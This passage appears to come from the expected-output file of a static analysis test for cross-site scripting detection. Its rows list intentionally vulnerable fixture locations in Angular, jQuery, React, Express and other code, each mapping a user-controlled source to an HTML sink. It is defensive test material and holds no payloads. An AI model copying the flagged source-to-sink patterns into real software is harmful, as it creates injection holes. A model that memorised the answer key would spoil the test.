this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... 
ragment | user-provided value | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. 
| angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | -| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | -| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | -| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | -| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. 
| classnames.js:8:59:8:69 | window.name | user-provided value | -| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | -| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | -| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | -| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:15:52:15:62 | window.name | user-provided value | -| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | -| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | -| clipboard.ts:33:19:33:68 | e.origi ... 
/html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | -| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | -| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | -| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | -| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | -| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. 
| d3.js:4:12:4:22 | window.name | user-provided value | -| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:16:31:16:69 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... 
aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:61:31:61:88 | `Time i ... 
aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | -| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | -| event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | -| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | -| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | -| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | -| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. 
| jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | -| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. 
| json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | -| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... 
.search | user-provided value | -| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | -| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | -| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. 
| pages/[id].jsx:26:10:26:22 | context.query | user-provided value | -| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | -| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | -| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | -| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | -| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. 
| react-use-router.js:23:43:23:54 | router.query | user-provided value | -| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | -| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | -| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | -| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | -| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | -| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. 
| sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | -| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | -| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... 
on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. 
| string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | -| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | 